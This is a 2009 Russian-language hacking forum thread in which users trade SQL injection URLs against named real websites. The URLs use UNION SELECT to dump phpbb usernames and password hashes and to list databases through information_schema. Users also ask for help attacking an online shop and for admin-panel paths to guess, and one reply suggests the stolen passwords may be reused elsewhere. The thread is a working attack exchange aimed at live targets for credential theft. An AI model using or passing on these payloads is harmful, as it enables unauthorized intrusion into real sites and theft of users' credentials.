27.06.2009, 12:17
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
|
|
|
27.06.2009, 12:57
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от GOGA075
подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
таблица phpbb_users находится в базе данных SC:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273)
причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1
может эти пароли куда-то и подойдут 
|
|
|
|
27.06.2009, 12:55
|
|
Новичок
Регистрация: 02.11.2008
Сообщений: 25
С нами:
9221480
Репутация:
55
|
|
мега шоп, с ПР5. помогите раскрутить.
при попытках присвоить переменной productid значения -1 или 99999999999 или 1+and+1=1 редиректит на страницу "acess denied"
http://store.awn.com/product.php?productid=15'
|
|
|
|
27.06.2009, 13:15
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
А как можно перемещатся по БД, ели она не одна??
|
|
|
|
27.06.2009, 13:20
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
from имя_базы.таблица
|
|
|
|
27.06.2009, 13:26
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
С нами:
8916053
Репутация:
-4
|
|
выложите список возможных путей в админку.
ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?
|
|
|
|
27.06.2009, 13:42
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
AlexSatter
А как мне узнать имина баз?
|
|
|
|
27.06.2009, 13:47
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами:
9230381
Репутация:
90
|
|
Сообщение от GOGA075
AlexSatter
А как мне узнать имина баз?
Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1
или
?id=-1+union+select+concat(table_name)+from+information _schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы.
Если 4-я ветка, то узнать имена таблиц можно только перебором.
|
|
|
|
27.06.2009, 13:48
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
select table_schema from information_schema.tables where table_name='table_name'
для 5той ветки
|
|
|
|
27.06.2009, 13:51
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
да мне не таблицы нужны!
а название баз данных!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
